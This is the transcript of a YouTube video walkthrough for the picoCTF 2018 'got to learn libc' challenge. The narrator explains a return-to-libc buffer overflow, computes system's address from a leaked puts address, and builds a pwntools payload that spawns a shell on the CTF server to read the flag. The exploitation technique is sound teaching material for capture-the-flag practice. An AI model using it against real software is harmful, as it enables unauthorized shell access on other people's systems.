 What's going on YouTube? This is another CTF challenge video write up for the challenge got to learn libc from Pico CTF 2018. So it says this program gives you the address of some system calls. Can you get a shell? You can find the problem here on the shell server and we're given the source code as well. So let's go ahead and W get these things. I've just created a directory for us to work in and we can download the program and the source. So let's take a look at the source code. See what we're working with here. Looks like we have some regular includes, some definitions for the buffer size and flag size. We have a useful string been SH. So just the shell command that you'd see on Linux, not bash, but silly shell. And it says maybe this can be used to spawn a shell. Okay, cool. That is going to be useful for us. We have a vulnerable function here reads in a buffer. Supposedly it says enter a string and then it does not check the boundaries on our buffer. So we can like go through with a buffer overflow attack and exploit here. It says thanks exiting now and then that's about it. Okay. The main function sets our privileges to the next user or whoever actually owns this on the shell server. It says this prevents binocede from dropping the privileges. Okay, handy. Cause that means we will end up wanting to spawn a shell with this. And then it gives us some useful addresses. It gives us the address for puts, flush, read, write, and the useful string. And then it lets us run the vulnerable function. Okay. So let's take a look at what we really have when we run the binary here. Let's mark this as executable and try and run it. It says here are some useful addresses, puts 0xf7, DC, et cetera, et cetera. Same thing for all of these. They're all all's team to be in the same kind of format. And we can say with that f7, that is very likely on the stack or the location of the function kind of in memory as we're running the program. It also gives us the useful string, which is probably just going to be, I'm probably wrong about this. It's not the dot data or the dot bss section. It's one of those. But that will remain constant. That should not change. And I think if we run this again and again, maybe ASLR is on on or yeah. I'm wrong about how I'm finding these addresses or why they do not change, but they do not thankfully for us in this case. So what we can use and what we can take advantage of is actually some, oh, it looks like the useful string address changes. Maybe that's being sort of a different location each time. That's fine. Still something we can pull out because we're running the binary. So what we do want to be able to do is actually use a return to libc attack. And you can look this up online and find plenty of guides that do a much better job of explaining it than I do. But if you want to see it happen, this is how we can go about doing it here. So because we're given some of the addresses here, normally you'd be able to find these and like a memory leak or some corruption in the program that will allow us to find these memory addresses. We can determine the address of system or like the C function system that will run a system command. And we're in the case that we want, run bnsh or useful string to spawn a shell. So since we can figure this out by determining just an offset between one of these functions that is part of libc and the function of the offset of the address address for system in libc, we can calculate where it really is when this binary runs or when we run the program. So maybe that doesn't make sense right now but let's walk through and do it for real. I'm going to open up the vulnerable program in GDB and we could want to just examine puts, right? Puts can be the function that we wanna choose to actually determine where system is in the program's memory. It's not gonna give me anything yet because it hasn't ran the program. So if I just hit like run, we could break it main or something if we ever wanted to just to just, in fact, let's do that. Be main, hit run. And now that we've broken, we have all of the functions still initialized. So I can just simply x puts and it's at that location, right? Okay, let's just take note of this. I'll nano or let's sub on Ape.py. Get something moving here. Let's create a script user bin environment python and let's say GDB puts can equal that. And now let's go ahead and find the location of system. So that's at this address. Okay, so now we can find GDB system. Great, so let's determine the offset, right? We'll say offset will equal GDB puts minus GDB system. And now this offset, we can apply that with just using simple math, right? To go ahead and determine where that real system function is when we run the binary because we're seeing that leaked address for puts or whatever any of these system calls that we particularly want when we're running the program. So now let's go ahead and run the program, right? Let's clear out some of these and just work on our script here. I'm gonna use PwnTools because it's awesome. So let's say elf can equal elf or pwn.elf of .slashvulm. So if I were to look at it, now I have the binary that I can handle and work with. Cool, so what I could do is now determine a process for it. So let's do elf.process that will just be P. So it will run the binary just fine for us. If I run python ape, it's going to start and stop the process. Let's go ahead and work with it. Let's do printp.receive and it tells us, okay, here are some useful addresses. Let's call this prompt so we can go ahead and work with it and let's print out prompts, right? And now let's carve out the information that we want. Let's use regular expressions and let's do re.findall because I think that's pretty nice, good hack. re.findall puts location with our prompt and let's see what we got here. Okay, it is finding the address just fine for us. Great, let's say puts address or we can just call it puts, that's fine. And let's say bin bash, let's find the location of the useful string. We'll just carve that out so we can print puts, make sure we get that just fine and print bin bash. Make sure we get that just fine or bin sh, whatever. Great, okay, carve them out just fine. So now we can determine an offset that we've already calculated, right? We can use the offset to determine the real location of system by simply saying system can equal the puts location that we're getting. Let's go ahead and convert that from hex, right? Because that is int 16 because that's giving it to us as a string. We want to take it as an actual number and let's go ahead and subtract the offset. So now I got system and let's print out the hex of that to see if it's a pretty good put candidate, right? For where system could really be in the binary. Looks like it works just fine for us. Okay, so now that we know the location of system we can use that buffer overflow attack and technique to go ahead and exploit this binary and call system and run bin bash, get a shell. So let's do that. We want to overflow this. Let's test in the command line. Let's go ahead and do Python taxi, print. What's the buffer here? 148. Okay, let's crank that. Let's do a times maybe 156 or 140. Thinking about numbers here. 52, 56, yeah. Let's go 160. See what we cover. Crank that into vulnerable. No seg fault. Let's go 64. Geez, about 80. Does it not? Let's go 200. Am I even echoing this correctly? No, I'm not. Oh, I'm an idiot. I'm sorry. Okay, that's totally my fault. I'm sorry. Now we should totally get a seg fault. All right, sweet, 160. Let's check out dmessage now. Okay, 4141. Let's do 156. And then add in BBB. Termin that is the, okay, great. That is the offset. So we want now our payload to equal a times 156. And then we want the address of the function that we want to go ahead and jump to, right? So we need that in little endian. And that's why we have P-Pone installed or Pone tools. So we can use P32 of system. Payload plus equals Pone32 of system. We need a return address following that, right? So that can be junk, four letters, because that's just the size that we need. And then we can use payload plus equals that useful string. But remember, it's got to be in little endian. So bin bash, or I suppose binsh is the proper name. Great, so now we've got our payload. Okay, let's go ahead and send this to the program, right? Let's do p.sendline payload. And then let's make it interactive now that we've actually sent the payload and exploited it supposedly. So let's go P-interactive. That sounds really funny to say. Let's go P-interactive. All right, we can run our script. And okay, broke something. Cannot convert argument integer. Oh, binsh is still int 16. Let's do the same thing for puts. So we convert as a real number and not a string. We don't need to do that in our system calculation anymore. It's system printed anymore and more either. So now we run this, fingers crossed. Still have an issue. What is the problem? System. Oh, goodness, puts. I had a typo. Okay, thanks exiting now. And nothing. Is that the right offset? We were doing, I don't know what I'm thinking there. 424242, 156 should be the address that we want, but that may not be IP. Yeah, yeah, yeah. Okay, so I didn't fill up the instruction pointer. I always do that. I always misread this portion when I should really be looking at the instruction pointer that follows. So let's change this to 60 and let's see how that works. Maybe hopefully, please run our eight script. Okay, cool. We don't get an end of file. I can at less and we have a shell. All right. So we are successfully running shell or binsh. So now we can use the same attack script in our actual, like on the shell server, right? Do it for real. So let's dot SSH, get over there, enter my password, and let's jump to that location. And one awesome thing about Pico CTF, like props to them, is that they, can I write in here, attack dot SH, or dot pi? I don't have permission. Okay. Let's make a home directory thing. Oh boy. Make directory, John, sweet. See John. Okay. Let's copy all of those things into here. Can I do that? Nope. Don't have flag. Okay. Let's create a symbolic link, lntech s, this thing, flag, flag dot text into this directory. Okay, cool. So I can't read it still, but I can work with bone and bone scene everything. So let's create our attack dot pi in a file now that we have permission to write in. And let's go ahead and paste all this information in. So awesome thing about Pico CTF is that they actually have all of these, like attack tools and stuff that we want. I think radar two is actually installed on this. Oh, guess not. But bone tools is certainly installed. And we can use those on the shell server. So let's go ahead and run Python attack. It starts our program. And we fail. Why is that? Maybe we can run GDB and change these variables. Maybe it's just the shell server specifically. Let's try and run GDB volum. Run it. And then let's X system. Take note of this. And X puts. Take note of this. Now let's modify our script to use these values, which is the same. But system is different. Huh, peculiar. Okay. Now let's see how we do. Python attack. Sweet. We have a shell. Let's check out flag.text. Still no. What? Oh, you know what? Maybe I'm an idiot. I probably, yeah, I have suddenly retained all of these permissions. And that's not cool. Let's change our attack script once again to not just use this, not just use our binary and the one in our directory as the real program that we're trying to run, but instead use the one at that location. So nano attack.py. And then rather than using poem.elf at volum in the current directory, let's do it at the real problem. So now fingers crossed. All right. Can I now read flag.text? Yes, I can. Awesome. That was cool. I hope you liked that one. I hope you learned a lot. Hopefully I didn't breeze through it too much or I didn't go into too many weird tangents or say too many stupid things that it totally derailed what you were trying to learn. But that is the attack for a return to libc, like technique, right? You can, if you have a memory leak or if you can find the address of some function in the binary while the binary is running, you can calculate where system is going to be in libc. And then you can go ahead and run system with some strings you can probably dig out or carve out a binary. In this case, Pico was very nice to us and they just straight up gave us a string for bnsh. And awesome. Now you've got a shell because you can call system if you've got an attack where you can control EIP or the instruction pointer, call system, give the argument to run a shell command, run bash maybe, and then you've got a compromised system in a cool, cool case. So let's take note of this, flag.textforreal. There it is. Let's go ahead and submit it, 250 points, not a whole lot of solves. So some good learning, some good learning that we just did there. Let's move that to a completed challenge and we are done. Alrighty, before I go, I want to thank again and again so much that it's painful to me and other people. Thank you to the people that support me on Patreon. I cannot say it enough. $1 a month on Patreon will give you a special shout out just like this at the end of every video. Get your name up in lights at the very end of a video that stupid John Hammond produces on the internet. I don't know why that would be appealing, but I'm grateful for you and your generous donations and thank you for funding me. Can't say it enough. $5 a month on Patreon will give you early access to all the videos that I create and release on YouTube before they go live because I like to try and backlog some stuff although I am not always successful but in the case that you do want to see some of that stuff preemptively, if you catch it at the right time then $5 a month and I'm grateful for you and your support. All right, if you did like this video please do like, comment and subscribe. Join us in the Discord server, link in the description, awesome community, really great people. It's growing and getting bigger and I'm loving it. I hope you guys are too. All right, I'll record something else now. I'm on a kick, I'm in a groove. Hopefully I can get a few more of these done. Hope to see you guys in the next video. Hope to see you on Patreon and have a great day.